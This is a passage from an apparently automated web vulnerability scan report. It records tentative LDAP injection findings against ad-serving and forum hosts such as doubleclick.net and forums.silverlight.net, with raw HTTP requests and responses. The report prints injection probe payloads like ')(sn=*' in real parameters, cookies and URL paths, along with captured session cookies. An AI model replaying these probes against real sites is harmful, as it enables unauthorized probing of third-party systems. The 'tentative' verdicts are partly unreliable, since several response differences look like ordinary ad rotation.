The &PID parameter appears to be vulnerable to LDAP injection attacks.

The payloads 9a64f1d27d5c07b6)(sn=* and 9a64f1d27d5c07b6)!(sn=* were each submitted in the &PID parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=9a64f1d27d5c07b6)(sn=*&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6615

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2530996/Schwab_AI_Q410_Options-Charting_300x250.swf";
var gif = "http://s0.2mdn.net/2530996/Schwab_AI_Q410_Webinar-Analysis_300x250.gif";
var minV = 10;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=9a64f1d27d5c07b6)(sn=*&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/cc/%2a/u%3B234282361%3B0-0%3B0%3B58044029%3B4307-300/250%3B38529125/38546882/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();

var defaultCtVal = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=9a64f1d27d5c07b6)(sn=*&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/cc/%2a/u%3B234282361%3B0-0%3B0%3B58044029%3B4307-300/250%3B38529125/38546882/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "http://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU";
ctp[1] = "clickTag1";
ctv[1] = "http://www.theocc.com/about/publications/character-risks.jsp";

var fv='"moviePath='+
...[SNIP]...

Request 2

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=9a64f1d27d5c07b6)!(sn=*&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6450

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2530996/Schwab_AI_Q410_ETFHQ-Pricing_300x250.swf";
var gif = "http://s0.2mdn.net/2530996/Schwab_AI_Q410_Webinar-Analysis_300x250.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=9a64f1d27d5c07b6)!(sn=*&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/cd/%2a/f%3B234282360%3B1-0%3B0%3B58044029%3B4307-300/250%3B38529150/38546907/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Research/ETFoverview.aspx[QM][AMP]offer=PLU");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();

var defaultCtVal = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=9a64f1d27d5c07b6)!(sn=*&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/cd/%2a/f%3B234282360%3B1-0%3B0%3B58044029%3B4307-300/250%3B38529150/38546907/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Research/ETFoverview.aspx[QM][AMP]offer=PLU");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "http://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Research/ETFoverview.aspx[QM][AMP]offer=PLU";

var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctInde
...[SNIP]...

2.5. http://ad.doubleclick.net/adj/N4478.redactedOX2487/B5084478.4 [AN parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.doubleclick.net
Path:	/adj/N4478.redactedOX2487/B5084478.4

Issue detail

The AN parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the AN parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /adj/N4478.redactedOX2487/B5084478.4;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003G/81000000000034516.1?!&&PID=8240106&UIT=G&TargetID=37665412&AN=*)(sn=*&PG=NBCSAT&ASID=04cbc315ee164e08b173b0c21e708489&destination=;ord=806044538? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 01:40:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4617

document.write('\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write('\n');

function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1782317/SEA8889_30series_newegg_1_21_300x250.swf";
var gif = "http://s0.2mdn.net/1782317/SEA8889_30series_newegg_1_21_300x250.jpg";
var minV = 8;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/s%3B233397388%3B0-0%3B0%3B57368132%3B4307-300/250%3B40404797/40422584/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://www.newegg.com/Product/Product.aspx?Item=N82E16824001423&Tpk=B2230HD");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();
sm[1] = "";
sm[2] = "";
sm[3] = "";
sm[4] = "";
sm[5] = "";

var ct=new Array();
ct[0]="";if(ct[0].substr(0,4)!="http"){ct[0]="";}
ct[1] = "";
ct[2] = "";
ct[3] = "";
ct[4] = "";
ct[5] = "";
ct[6] = "";
ct[7] = "";
ct[8] = "";
ct[9] = "";
ct[10] = "";

var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/s%3B233397388%3B0-0%3B0%3B57368132%3B4307-300/250%3B40404797/40422584/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3f"+ct[i]);}else{x=escape(ct[i]);}fv+="&clickTag"+i+"="+x+"&clickTAG"+i+"="+x+"&clicktag"+i+"="+x;}}
fv+='"';
var bgo=(bg=="same as SWF")?"":'<param name="bgcolor" value="#'+bg+'">';
var bge=(bg=="same as SWF")?"":' bgcolor="#'+bg+'"';
function FSWin(){if((openWindow=="false
...[SNIP]...

Request 2

GET /adj/N4478.redactedOX2487/B5084478.4;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003G/81000000000034516.1?!&&PID=8240106&UIT=G&TargetID=37665412&AN=*)!(sn=*&PG=NBCSAT&ASID=04cbc315ee164e08b173b0c21e708489&destination=;ord=806044538? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 01:40:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5626

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write('\r\n');

function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1782317/SEA8889_30series_tiger_1_21_300x250.swf";
var gif = "http://s0.2mdn.net/1782317/SEA8889_31series_newegg_1_21_300x250.jpg";
var minV = 8;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/d%3B233397388%3B2-0%3B0%3B57368132%3B4307-300/250%3B40404840/40422627/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://www.tigerdirect.com/applications/SearchTools/item-details.asp?EdpNo=6532393");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();

var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/d%3B233397388%3B2-0%3B0%3B57368132%3B4307-300/250%3B40404840/40422627/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://www.tigerdirect.com/applications/SearchTools/item-details.asp?EdpNo=6532393");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";
ctp[1] = "clickTag";
ctv[1] = "";
ctp[2] = "clickTag";
ctv[2] = "";
ctp[3] = "clickTag";
ctv[3] = "";

var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%
...[SNIP]...

2.6. http://assets.rubiconproject.com/static/rtb/sync-min.html/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://assets.rubiconproject.com
Path:	/static/rtb/sync-min.html/

Issue detail

The REST URL parameter 2 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /static/*)(sn=*/sync-min.html/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; pup_2081=1296226100651; lm="28 Jan 2011 14:48:45 GMT"; pup_2084=1296226112564; pup_w55c=1296073239463; put_2132=D8DB51BF08484217F5D14AB47F4002AD; pup_2132=1296226115755; pup_rubicon=1296232891481; pup_1902=1296226099073; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; csi9=3151064.js^1^1296308448^1296308448&618554.js^1^1296308324^1296308324; put_1185=3011330574290390485; pup_1197=1296232890383; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%263612%3D1%262372%3D1%262196%3D1%262111%3D1%262494%3D1%262189%3D1%263169%3D1%262374%3D1; rdk=7665/13236; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; put_2081=CA-00000000456885722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_1994=6ch47d7o8wtv; pup_1512=1296224128533; pup_1986=1296226114410; pup_2100=1296226117318; pup_2025=1296224125224; pup_2101=1296226106985; put_2100=usr3fd748acf5bcab14; pup_1430=1296224129445; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; pup_1185=1296226114213; khaos=GIPAEQ2D-C-IOYY; put_1197=3297869551067506954; au=GIP9HWY4-MADS-10.208.38.239; pup_1994=1296072492983; ruid=154d290e46adc1d6f373dd09^7^1296350983^2915161843; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; csi2=3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415; ses9=9320^1&7531^1; pup_fimserve=1296224133489; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1986=4760492999213801733; rdk2=0; ses2=7531^1&13236^1; cd=false;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 318
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 30 Jan 2011 02:05:46 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/*)(sn=*/sync-min.html/ was not found on this
...[SNIP]...
</p>
<hr>
<address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address>
</body></html>

Request 2

GET /static/*)!(sn=*/sync-min.html/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; pup_2081=1296226100651; lm="28 Jan 2011 14:48:45 GMT"; pup_2084=1296226112564; pup_w55c=1296073239463; put_2132=D8DB51BF08484217F5D14AB47F4002AD; pup_2132=1296226115755; pup_rubicon=1296232891481; pup_1902=1296226099073; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; csi9=3151064.js^1^1296308448^1296308448&618554.js^1^1296308324^1296308324; put_1185=3011330574290390485; pup_1197=1296232890383; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%263612%3D1%262372%3D1%262196%3D1%262111%3D1%262494%3D1%262189%3D1%263169%3D1%262374%3D1; rdk=7665/13236; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; put_2081=CA-00000000456885722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_1994=6ch47d7o8wtv; pup_1512=1296224128533; pup_1986=1296226114410; pup_2100=1296226117318; pup_2025=1296224125224; pup_2101=1296226106985; put_2100=usr3fd748acf5bcab14; pup_1430=1296224129445; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; pup_1185=1296226114213; khaos=GIPAEQ2D-C-IOYY; put_1197=3297869551067506954; au=GIP9HWY4-MADS-10.208.38.239; pup_1994=1296072492983; ruid=154d290e46adc1d6f373dd09^7^1296350983^2915161843; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; csi2=3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415; ses9=9320^1&7531^1; pup_fimserve=1296224133489; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1986=4760492999213801733; rdk2=0; ses2=7531^1&13236^1; cd=false;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 228
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 30 Jan 2011 02:05:46 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/*)!(sn=*/sync-min.html/ was not found on this
...[SNIP]...
</p>
</body></html>

2.7. http://click.pulse360.com/cgi-bin/clickthrough.cgi [creative parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://click.pulse360.com
Path:	/cgi-bin/clickthrough.cgi

Issue detail

The creative parameter appears to be vulnerable to LDAP injection attacks.

The payloads 9942f194f5ec0141)(sn=* and 9942f194f5ec0141)!(sn=* were each submitted in the creative parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /cgi-bin/clickthrough.cgi?db=context&position=7001&tid=bhnibpnmbjnlbgnjbnnpzn&eid=1&id=92509073&creative=9942f194f5ec0141)(sn=*&query=site%20specific%3Amsnbc.com%3Aimage%20image&clickid=92896433&tz=US&UNQ=00000129635037996412713000000106050054&value=UO22E35J253LM&origvalue=GZODAL6QJGBNK&cgroup=adbreak4_blogs HTTP/1.1
Host: click.pulse360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 02:06:49 GMT
Server: Denaro/1.1
Connection: close
Location: http://c2.edapebaf.com/cgi-bin/unbilled_click.cgi?id=92509073&source=92896433&db=context&query=site%20specific%3Amsnbc.com%3Aimage%20image&creative=9942f194f5ec0141)(sn&subid=
Content-Type: text/html

Request 2

GET /cgi-bin/clickthrough.cgi?db=context&position=7001&tid=bhnibpnmbjnlbgnjbnnpzn&eid=1&id=92509073&creative=9942f194f5ec0141)!(sn=*&query=site%20specific%3Amsnbc.com%3Aimage%20image&clickid=92896433&tz=US&UNQ=00000129635037996412713000000106050054&value=UO22E35J253LM&origvalue=GZODAL6QJGBNK&cgroup=adbreak4_blogs HTTP/1.1
Host: click.pulse360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 02:06:50 GMT
Server: Denaro/1.1
Connection: close
Location: http://c2.edapebaf.com/cgi-bin/unbilled_click.cgi?id=92509073&source=92896433&db=context&query=site%20specific%3Amsnbc.com%3Aimage%20image&creative=9942f194f5ec0141)!(sn&subid=
Content-Type: text/html

2.8. http://forums.silverlight.net/forums/53.aspx [ASP.NET_SessionId cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://forums.silverlight.net
Path:	/forums/53.aspx

Issue detail

The ASP.NET_SessionId cookie appears to be vulnerable to LDAP injection attacks.

The payloads c9aa3c72e7b4fb27)(sn=* and c9aa3c72e7b4fb27)!(sn=* were each submitted in the ASP.NET_SessionId cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /forums/53.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=c9aa3c72e7b4fb27)(sn=*;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 72837
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 10:40:01 GMT; expires=Mon, 30-Jan-2012 15:40:01 GMT; path=/
Set-Cookie: ASP.NET_SessionId=0uiuc355vxi0jo55duaqdi45; path=/; HttpOnly
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:00:01 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:40:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
WCF RI
...[SNIP]...
<a href="/members/mbanavige.aspx" title="mbanavige" class="online">
<img src="http://i3.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319808000000000&cdn_id=12152010" alt="mbanavige" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i3.silverlight.net/avatar/mbanavige.jpg?forceidenticon=False&dt=634319808000000000&cdn_id=12152010');" />
</a>
</li>

<li>
<a href="/members/Gaz3ll.aspx" title="Gaz3ll" class="online">
<img src="http://i3.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319808000000000&cdn_id=12152010" alt="Gaz3ll" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i1.silverlight.net/avatar/Gaz3ll.jpg?forceidenticon=False&dt=634319808000000000&cdn_id=12152010');" />
</a>
</li>

<li>
<a href="/members/Tony.Champion.aspx" title="Tony.Champion" class="online">
<img src="http://i3.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319808000000000&cdn_id=12152010" alt="Tony.Champion" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i3.silverlight.net/avatar/Tony.Champion.jpg?forceidenticon=False&dt=634319808000000000&cdn_id=12152010');" />
</a>
</li>

<li>
<a href="/members/j2inet.aspx" title="j2inet" class="online">
<img src="http://i3.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319808000000000&cdn_id=12152010" alt="j2inet" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i3.silverlight.net/avatar/j2inet.jpg?forceidenticon=False&dt=634319808000000000&cdn_id=12152010');" />
</a>
</li>

...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 72821
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 10:40:02 GMT; expires=Mon, 30-Jan-2012 15:40:02 GMT; path=/
Set-Cookie: ASP.NET_SessionId=3vu44r55bgcoj055yau41u45; path=/; HttpOnly
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:00:02 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:40:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
WCF RI
...[SNIP]...
<a href="/members/mbcrump.aspx" title="mbcrump" class="online">
<img src="http://i3.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319808000000000&cdn_id=12152010" alt="mbcrump" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i1.silverlight.net/avatar/mbcrump.jpg?forceidenticon=False&dt=634319808000000000&cdn_id=12152010');" />
</a>
</li>

<li>
<a href="/members/pitchai.be.aspx" title="pitchai.be" class="online">
<img src="http://i3.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319808000000000&cdn_id=12152010" alt="pitchai.be" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i3.silverlight.net/avatar/pitchai.be.jpg?forceidenticon=False&dt=634319808000000000&cdn_id=12152010');" />
</a>
</li>

<li>
<a href="/members/atti.aspx" title="atti" class="online">
<img src="http://i3.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319808000000000&cdn_id=12152010" alt="atti" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i1.silverlight.net/avatar/atti.jpg?forceidenticon=False&dt=634319808000000000&cdn_id=12152010');" />
</a>
</li>

<li>
